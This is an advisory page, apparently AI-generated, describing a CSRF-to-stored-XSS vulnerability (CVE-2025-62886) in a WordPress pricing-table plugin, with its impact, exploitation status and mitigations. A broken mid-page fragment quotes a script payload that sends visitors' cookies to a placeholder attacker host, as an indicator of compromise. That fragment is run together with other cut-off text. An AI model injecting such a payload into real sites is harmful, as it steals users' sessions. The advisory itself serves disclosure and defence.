
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-62886 is a Cross-Site Request Forgery (CSRF) vulnerability in the wpdevart Pricing Table builder WordPress plugin that enables Stored Cross-Site Scripting (XSS). It affects all versions of the plugin up to and including 1.5.3, with no official patch currently available. The vulnerability was reported by researcher Skalucy on May 30, 2025, and published by Patchstack on June 29, 2025. It carries a CVSS v3.1 base score of 7.1 (High) (Patchstack, Red Hat CVE).
The root cause is classified as CWE-352 (Cross-Site Request Forgery), where the plugin fails to implement adequate CSRF token validation on sensitive administrative actions, allowing those actions to be triggered by forged requests (Patchstack). An unauthenticated attacker can craft a malicious web page or link that, when visited by an authenticated WordPress administrator, silently submits a forged request to the plugin's endpoints — resulting in the storage of attacker-controlled JavaScript (Stored XSS) within the site's database. The attack vector is network-based, requires no privileges, but does require user interaction (a privileged user clicking a malicious link or visiting a crafted page). No public proof-of-concept code has been identified at this time (Red Hat CVE).
Successful exploitation allows an attacker to inject and persistently store malicious scripts within the WordPress site, which are then executed in the browsers of any user who views the affected pricing table content. This can lead to session hijacking, credential theft, unauthorized administrative actions, defacement of website content, and potential full compromise of the WordPress installation. The changed scope in the CVSS vector indicates that the impact extends beyond the plugin itself to affect the broader WordPress environment and its users (Patchstack).
There is no evidence of public proof-of-concept exploit code or active in-the-wild exploitation at this time (Patchstack). The EPSS score is extremely low at 0.000080, reflecting a minimal probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack notes that CSRF vulnerabilities of this type are sometimes leveraged in mass-exploit campaigns targeting WordPress plugins at scale, regardless of individual site traffic.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) in a plugin input field.<script> tags or JavaScript payloads stored in WordPress database tables associated with the wpdevart Pricing Table builder plugin (e.g., wp_options or custom plugin tables).As of the time of publication, no official patch is available for the wpdevart Pricing Table builder plugin — all versions up to and including 1.5.3 are considered vulnerable (Patchstack). Site administrators should consider deactivating and removing the plugin until a patched version is released by the developer. As interim mitigations, restrict access to the WordPress admin panel to trusted IP addresses, enforce strong session management, and deploy a Web Application Firewall (WAF) capable of detecting CSRF and XSS patterns. Patchstack's virtual patching feature can provide protection for subscribers while awaiting an official fix.
The vulnerability was discovered and disclosed by independent researcher Skalucy through Patchstack's vulnerability disclosure program, published on June 29, 2025 (Patchstack). Patchstack classifies the issue as low priority with unlikely exploitation impact, though it notes that CSRF vulnerabilities in WordPress plugins are commonly used in mass-exploit campaigns. No significant broader media coverage or notable researcher commentary beyond the initial Patchstack disclosure has been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."